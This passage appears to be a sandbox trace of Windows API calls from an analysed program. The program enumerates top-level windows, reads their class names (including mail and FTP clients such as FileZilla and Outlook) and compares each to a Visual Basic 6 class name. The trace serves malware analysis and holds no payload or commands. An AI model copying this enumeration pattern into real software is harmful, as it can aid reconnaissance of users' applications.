lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.708] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.708] GetWindowThreadProcessId (in: hWnd=0x1026c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf20 [0231.708] GetWindow (hWnd=0x1026c, uCmd=0x2) returned 0x20264 [0231.708] GetClassNameA (in: hWnd=0x20264, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="pidginapp") returned 9 [0231.708] lstrcmpA (lpString1="pidginapp", lpString2="ThunderRT6Main") returned -1 [0231.708] GetWindowThreadProcessId (in: hWnd=0x20264, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf14 [0231.708] GetWindow (hWnd=0x20264, uCmd=0x2) returned 0x10266 [0231.708] GetClassNameA (in: hWnd=0x10266, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.708] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.708] GetWindowThreadProcessId (in: hWnd=0x10266, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf14 [0231.708] GetWindow (hWnd=0x10266, uCmd=0x2) returned 0x2025e [0231.708] GetClassNameA (in: hWnd=0x2025e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="outlook_window") returned 14 [0231.708] lstrcmpA (lpString1="outlook_window", lpString2="ThunderRT6Main") returned -1 [0231.708] GetWindowThreadProcessId (in: hWnd=0x2025e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xee0 [0231.708] GetWindow (hWnd=0x2025e, uCmd=0x2) returned 0x10262 [0231.708] GetClassNameA (in: hWnd=0x10262, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.708] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.708] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xee0 [0231.708] GetWindow (hWnd=0x10262, uCmd=0x2) returned 0x1025c [0231.708] GetClassNameA (in: hWnd=0x1025c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="operamail_win") returned 13 [0231.708] lstrcmpA (lpString1="operamail_win", lpString2="ThunderRT6Main") returned -1 [0231.708] GetWindowThreadProcessId (in: hWnd=0x1025c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x3cc [0231.708] GetWindow (hWnd=0x1025c, uCmd=0x2) returned 0x10260 [0231.709] GetClassNameA (in: hWnd=0x10260, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.709] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.709] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x3cc [0231.709] GetWindow (hWnd=0x10260, uCmd=0x2) returned 0x10258 [0231.709] GetClassNameA (in: hWnd=0x10258, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="notepad_app") returned 11 [0231.709] lstrcmpA (lpString1="notepad_app", lpString2="ThunderRT6Main") returned -1 [0231.709] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2d4 [0231.709] GetWindow (hWnd=0x10258, uCmd=0x2) returned 0x2025a [0231.709] GetClassNameA (in: hWnd=0x2025a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.709] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.709] GetWindowThreadProcessId (in: hWnd=0x2025a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2d4 [0231.709] GetWindow (hWnd=0x2025a, uCmd=0x2) returned 0x20254 [0231.709] GetClassNameA (in: hWnd=0x20254, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ncftpapp") returned 8 [0231.709] lstrcmpA (lpString1="ncftpapp", lpString2="ThunderRT6Main") returned -1 [0231.709] GetWindowThreadProcessId (in: hWnd=0x20254, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1fc [0231.709] GetWindow (hWnd=0x20254, uCmd=0x2) returned 0x20256 [0231.709] GetClassNameA (in: hWnd=0x20256, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.709] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.709] GetWindowThreadProcessId (in: hWnd=0x20256, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1fc [0231.709] GetWindow (hWnd=0x20256, uCmd=0x2) returned 0x10250 [0231.709] GetClassNameA (in: hWnd=0x10250, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="leechftp_") returned 9 [0231.709] lstrcmpA (lpString1="leechftp_", lpString2="ThunderRT6Main") returned -1 [0231.709] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xab0 [0231.709] GetWindow (hWnd=0x10250, uCmd=0x2) returned 0x10252 [0231.709] GetClassNameA (in: hWnd=0x10252, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.709] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.709] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xab0 [0231.709] GetWindow (hWnd=0x10252, uCmd=0x2) returned 0x1024c [0231.709] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="icqcls") returned 6 [0231.710] lstrcmpA (lpString1="icqcls", lpString2="ThunderRT6Main") returned -1 [0231.710] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb08 [0231.710] GetWindow (hWnd=0x1024c, uCmd=0x2) returned 0x2024e [0231.710] GetClassNameA (in: hWnd=0x2024e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.710] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.710] GetWindowThreadProcessId (in: hWnd=0x2024e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb08 [0231.710] GetWindow (hWnd=0x2024e, uCmd=0x2) returned 0x10248 [0231.710] GetClassNameA (in: hWnd=0x10248, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="gmailnotifierpro_wnd") returned 20 [0231.710] lstrcmpA (lpString1="gmailnotifierpro_wnd", lpString2="ThunderRT6Main") returned -1 [0231.710] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd64 [0231.710] GetWindow (hWnd=0x10248, uCmd=0x2) returned 0x2024a [0231.710] GetClassNameA (in: hWnd=0x2024a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.710] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.710] GetWindowThreadProcessId (in: hWnd=0x2024a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd64 [0231.710] GetWindow (hWnd=0x2024a, uCmd=0x2) returned 0x20242 [0231.710] GetClassNameA (in: hWnd=0x20242, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="foxmailincmail_app") returned 18 [0231.710] lstrcmpA (lpString1="foxmailincmail_app", lpString2="ThunderRT6Main") returned -1 [0231.710] GetWindowThreadProcessId (in: hWnd=0x20242, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd40 [0231.710] GetWindow (hWnd=0x20242, uCmd=0x2) returned 0x20246 [0231.710] GetClassNameA (in: hWnd=0x20246, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.710] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.710] GetWindowThreadProcessId (in: hWnd=0x20246, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd40 [0231.710] GetWindow (hWnd=0x20246, uCmd=0x2) returned 0x10240 [0231.710] GetClassNameA (in: hWnd=0x10240, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="flingwnd") returned 8 [0231.710] lstrcmpA (lpString1="flingwnd", lpString2="ThunderRT6Main") returned -1 [0231.710] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xbd0 [0231.710] GetWindow (hWnd=0x10240, uCmd=0x2) returned 0x10244 [0231.710] GetClassNameA (in: hWnd=0x10244, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.710] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.711] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xbd0 [0231.711] GetWindow (hWnd=0x10244, uCmd=0x2) returned 0x1023c [0231.711] GetClassNameA (in: hWnd=0x1023c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="flashfxp_") returned 9 [0231.711] lstrcmpA (lpString1="flashfxp_", lpString2="ThunderRT6Main") returned -1 [0231.711] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c4 [0231.711] GetWindow (hWnd=0x1023c, uCmd=0x2) returned 0x2023e [0231.711] GetClassNameA (in: hWnd=0x2023e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.711] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.711] GetWindowThreadProcessId (in: hWnd=0x2023e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c4 [0231.711] GetWindow (hWnd=0x2023e, uCmd=0x2) returned 0x20236 [0231.711] GetClassNameA (in: hWnd=0x20236, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="filezilla_app") returned 13 [0231.711] lstrcmpA (lpString1="filezilla_app", lpString2="ThunderRT6Main") returned -1 [0231.711] GetWindowThreadProcessId (in: hWnd=0x20236, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc68 [0231.711] GetWindow (hWnd=0x20236, uCmd=0x2) returned 0x2023a [0231.711] GetClassNameA (in: hWnd=0x2023a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.711] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.711] GetWindowThreadProcessId (in: hWnd=0x2023a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc68 [0231.711] GetWindow (hWnd=0x2023a, uCmd=0x2) returned 0x401b6 [0231.711] GetClassNameA (in: hWnd=0x401b6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="far_") returned 4 [0231.711] lstrcmpA (lpString1="far_", lpString2="ThunderRT6Main") returned -1 [0231.711] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb50 [0231.711] GetWindow (hWnd=0x401b6, uCmd=0x2) returned 0x10238 [0231.711] GetClassNameA (in: hWnd=0x10238, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.711] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.711] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb50 [0231.711] GetWindow (hWnd=0x10238, uCmd=0x2) returned 0x3007e [0231.711] GetClassNameA (in: hWnd=0x3007e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="coreftpcls") returned 10 [0231.711] lstrcmpA (lpString1="coreftpcls", lpString2="ThunderRT6Main") returned -1 [0231.711] GetWindowThreadProcessId (in: hWnd=0x3007e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc1c [0231.712] GetWindow (hWnd=0x3007e, uCmd=0x2) returned 0x10234 [0231.712] GetClassNameA (in: hWnd=0x10234, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.712] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.712] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc1c [0231.712] GetWindow (hWnd=0x10234, uCmd=0x2) returned 0x20082 [0231.712] GetClassNameA (in: hWnd=0x20082, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="bitkinexwindow") returned 14 [0231.712] lstrcmpA (lpString1="bitkinexwindow", lpString2="ThunderRT6Main") returned -1 [0231.712] GetWindowThreadProcessId (in: hWnd=0x20082, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe60 [0231.712] GetWindow (hWnd=0x20082, uCmd=0x2) returned 0x3006a [0231.712] GetClassNameA (in: hWnd=0x3006a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.712] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.712] GetWindowThreadProcessId (in: hWnd=0x3006a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe60 [0231.712] GetWindow (hWnd=0x3006a, uCmd=0x2) returned 0x20084 [0231.712] GetClassNameA (in: hWnd=0x20084, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="barca_window") returned 12 [0231.712] lstrcmpA (lpString1="barca_window", lpString2="ThunderRT6Main") returned -1 [0231.712] GetWindowThreadProcessId (in: hWnd=0x20084, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe80 [0231.712] GetWindow (hWnd=0x20084, uCmd=0x2) returned 0x30080 [0231.712] GetClassNameA (in: hWnd=0x30080, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.712] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.712] GetWindowThreadProcessId (in: hWnd=0x30080, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe80 [0231.712] GetWindow (hWnd=0x30080, uCmd=0x2) returned 0x20058 [0231.712] GetClassNameA (in: hWnd=0x20058, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="alftp_win") returned 9 [0231.712] lstrcmpA (lpString1="alftp_win", lpString2="ThunderRT6Main") returned -1 [0231.712] GetWindowThreadProcessId (in: hWnd=0x20058, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xbe0 [0231.712] GetWindow (hWnd=0x20058, uCmd=0x2) returned 0x30076 [0231.712] GetClassNameA (in: hWnd=0x30076, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.712] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.712] GetWindowThreadProcessId (in: hWnd=0x30076, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xbe0 [0231.713] GetWindow (hWnd=0x30076, uCmd=0x2) returned 0x20056 [0231.713] GetClassNameA (in: hWnd=0x20056, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="absolutetelnet_cls") returned 18 [0231.713] lstrcmpA (lpString1="absolutetelnet_cls", lpString2="ThunderRT6Main") returned -1 [0231.713] GetWindowThreadProcessId (in: hWnd=0x20056, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x954 [0231.713] GetWindow (hWnd=0x20056, uCmd=0x2) returned 0x3005a [0231.713] GetClassNameA (in: hWnd=0x3005a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.713] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.713] GetWindowThreadProcessId (in: hWnd=0x3005a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x954 [0231.713] GetWindow (hWnd=0x3005a, uCmd=0x2) returned 0x7007c [0231.713] GetClassNameA (in: hWnd=0x7007c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="3dftpcls") returned 8 [0231.713] lstrcmpA (lpString1="3dftpcls", lpString2="ThunderRT6Main") returned -1 [0231.713] GetWindowThreadProcessId (in: hWnd=0x7007c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb54 [0231.713] GetWindow (hWnd=0x7007c, uCmd=0x2) returned 0x50086 [0231.713] GetClassNameA (in: hWnd=0x50086, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.713] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.713] GetWindowThreadProcessId (in: hWnd=0x50086, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb54 [0231.713] GetWindow (hWnd=0x50086, uCmd=0x2) returned 0x3006c [0231.713] GetClassNameA (in: hWnd=0x3006c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Understood_Document_translations_class") returned 38 [0231.713] lstrcmpA (lpString1="Understood_Document_translations_class", lpString2="ThunderRT6Main") returned 1 [0231.713] GetWindowThreadProcessId (in: hWnd=0x3006c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe10 [0231.713] GetWindow (hWnd=0x3006c, uCmd=0x2) returned 0x30072 [0231.713] GetClassNameA (in: hWnd=0x30072, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.713] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.713] GetWindowThreadProcessId (in: hWnd=0x30072, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe10 [0231.713] GetWindow (hWnd=0x30072, uCmd=0x2) returned 0x30064 [0231.713] GetClassNameA (in: hWnd=0x30064, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Scuba_app") returned 9 [0231.713] lstrcmpA (lpString1="Scuba_app", lpString2="ThunderRT6Main") returned -1 [0231.713] GetWindowThreadProcessId (in: hWnd=0x30064, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe14 [0231.714] GetWindow (hWnd=0x30064, uCmd=0x2) returned 0x3007a [0231.714] GetClassNameA (in: hWnd=0x3007a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.714] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.714] GetWindowThreadProcessId (in: hWnd=0x3007a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe14 [0231.714] GetWindow (hWnd=0x3007a, uCmd=0x2) returned 0x3006e [0231.714] GetClassNameA (in: hWnd=0x3006e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="BufRemindUnderwearapp") returned 21 [0231.714] lstrcmpA (lpString1="BufRemindUnderwearapp", lpString2="ThunderRT6Main") returned -1 [0231.714] GetWindowThreadProcessId (in: hWnd=0x3006e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe1c [0231.714] GetWindow (hWnd=0x3006e, uCmd=0x2) returned 0x20068 [0231.714] GetClassNameA (in: hWnd=0x20068, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.714] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.714] GetWindowThreadProcessId (in: hWnd=0x20068, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe1c [0231.714] GetWindow (hWnd=0x20068, uCmd=0x2) returned 0x20060 [0231.714] GetClassNameA (in: hWnd=0x20060, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="printbondsbabywnd") returned 17 [0231.714] lstrcmpA (lpString1="printbondsbabywnd", lpString2="ThunderRT6Main") returned -1 [0231.714] GetWindowThreadProcessId (in: hWnd=0x20060, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdac [0231.714] GetWindow (hWnd=0x20060, uCmd=0x2) returned 0x20054 [0231.714] GetClassNameA (in: hWnd=0x20054, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.714] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.714] GetWindowThreadProcessId (in: hWnd=0x20054, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdac [0231.714] GetWindow (hWnd=0x20054, uCmd=0x2) returned 0x5005c [0231.714] GetClassNameA (in: hWnd=0x5005c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Purchase_class") returned 14 [0231.714] lstrcmpA (lpString1="Purchase_class", lpString2="ThunderRT6Main") returned -1 [0231.714] GetWindowThreadProcessId (in: hWnd=0x5005c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe18 [0231.714] GetWindow (hWnd=0x5005c, uCmd=0x2) returned 0x40050 [0231.714] GetClassNameA (in: hWnd=0x40050, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.714] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.714] GetWindowThreadProcessId (in: hWnd=0x40050, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe18 [0231.715] GetWindow (hWnd=0x40050, uCmd=0x2) returned 0x501c4 [0231.715] GetClassNameA (in: hWnd=0x501c4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="matt_Introduces_stretch_cls") returned 27 [0231.715] lstrcmpA (lpString1="matt_Introduces_stretch_cls", lpString2="ThunderRT6Main") returned -1 [0231.715] GetWindowThreadProcessId (in: hWnd=0x501c4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xda4 [0231.715] GetWindow (hWnd=0x501c4, uCmd=0x2) returned 0x2005e [0231.715] GetClassNameA (in: hWnd=0x2005e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.715] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.715] GetWindowThreadProcessId (in: hWnd=0x2005e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xda4 [0231.715] GetWindow (hWnd=0x2005e, uCmd=0x2) returned 0x30220 [0231.715] GetClassNameA (in: hWnd=0x30220, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Fighting_wnd") returned 12 [0231.715] lstrcmpA (lpString1="Fighting_wnd", lpString2="ThunderRT6Main") returned -1 [0231.715] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdf8 [0231.715] GetWindow (hWnd=0x30220, uCmd=0x2) returned 0x301be [0231.715] GetClassNameA (in: hWnd=0x301be, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.715] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.715] GetWindowThreadProcessId (in: hWnd=0x301be, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdf8 [0231.715] GetWindow (hWnd=0x301be, uCmd=0x2) returned 0x5004a [0231.715] GetClassNameA (in: hWnd=0x5004a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="postage_Saturday_") returned 17 [0231.715] lstrcmpA (lpString1="postage_Saturday_", lpString2="ThunderRT6Main") returned -1 [0231.715] GetWindowThreadProcessId (in: hWnd=0x5004a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xde4 [0231.715] GetWindow (hWnd=0x5004a, uCmd=0x2) returned 0x20196 [0231.715] GetClassNameA (in: hWnd=0x20196, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.715] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.715] GetWindowThreadProcessId (in: hWnd=0x20196, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xde4 [0231.715] GetWindow (hWnd=0x20196, uCmd=0x2) returned 0x40032 [0231.715] GetClassNameA (in: hWnd=0x40032, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Worlds_electric_app") returned 19 [0231.715] lstrcmpA (lpString1="Worlds_electric_app", lpString2="ThunderRT6Main") returned 1 [0231.715] GetWindowThreadProcessId (in: hWnd=0x40032, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdd4 [0231.715] GetWindow (hWnd=0x40032, uCmd=0x2) returned 0x4004e [0231.716] GetClassNameA (in: hWnd=0x4004e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.716] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.716] GetWindowThreadProcessId (in: hWnd=0x4004e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdd4 [0231.716] GetWindow (hWnd=0x4004e, uCmd=0x2) returned 0x50066 [0231.716] GetClassNameA (in: hWnd=0x50066, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="roadsGnomeKentclass") returned 19 [0231.716] lstrcmpA (lpString1="roadsGnomeKentclass", lpString2="ThunderRT6Main") returned -1 [0231.716] GetWindowThreadProcessId (in: hWnd=0x50066, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xaa8 [0231.716] GetWindow (hWnd=0x50066, uCmd=0x2) returned 0x30062 [0231.716] GetClassNameA (in: hWnd=0x30062, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.716] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.716] GetWindowThreadProcessId (in: hWnd=0x30062, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xaa8 [0231.716] GetWindow (hWnd=0x30062, uCmd=0x2) returned 0x30174 [0231.716] GetClassNameA (in: hWnd=0x30174, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Gif_resulting_wnd") returned 17 [0231.716] lstrcmpA (lpString1="Gif_resulting_wnd", lpString2="ThunderRT6Main") returned -1 [0231.716] GetWindowThreadProcessId (in: hWnd=0x30174, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x990 [0231.716] GetWindow (hWnd=0x30174, uCmd=0x2) returned 0x50070 [0231.716] GetClassNameA (in: hWnd=0x50070, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.716] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.716] GetWindowThreadProcessId (in: hWnd=0x50070, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x990 [0231.716] GetWindow (hWnd=0x50070, uCmd=0x2) returned 0x30170 [0231.716] GetClassNameA (in: hWnd=0x30170, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="adoptionDrywnd") returned 14 [0231.716] lstrcmpA (lpString1="adoptionDrywnd", lpString2="ThunderRT6Main") returned -1 [0231.716] GetWindowThreadProcessId (in: hWnd=0x30170, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcac [0231.716] GetWindow (hWnd=0x30170, uCmd=0x2) returned 0x20172 [0231.716] GetClassNameA (in: hWnd=0x20172, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.716] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.716] GetWindowThreadProcessId (in: hWnd=0x20172, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcac [0231.716] GetWindow (hWnd=0x20172, uCmd=0x2) returned 0x3016e [0231.716] GetClassNameA (in: hWnd=0x3016e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="AnotherCrossDroppedwin") returned 22 [0231.717] lstrcmpA (lpString1="AnotherCrossDroppedwin", lpString2="ThunderRT6Main") returned -1 [0231.717] GetWindowThreadProcessId (in: hWnd=0x3016e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xca0 [0231.717] GetWindow (hWnd=0x3016e, uCmd=0x2) returned 0x2016c [0231.717] GetClassNameA (in: hWnd=0x2016c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.717] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.717] GetWindowThreadProcessId (in: hWnd=0x2016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xca0 [0231.717] GetWindow (hWnd=0x2016c, uCmd=0x2) returned 0x301cc [0231.717] GetClassNameA (in: hWnd=0x301cc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Newsletterkdeclaimedcls") returned 23 [0231.717] lstrcmpA (lpString1="Newsletterkdeclaimedcls", lpString2="ThunderRT6Main") returned -1 [0231.717] GetWindowThreadProcessId (in: hWnd=0x301cc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd6c [0231.717] GetWindow (hWnd=0x301cc, uCmd=0x2) returned 0x2016a [0231.717] GetClassNameA (in: hWnd=0x2016a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.717] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.717] GetWindowThreadProcessId (in: hWnd=0x2016a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) 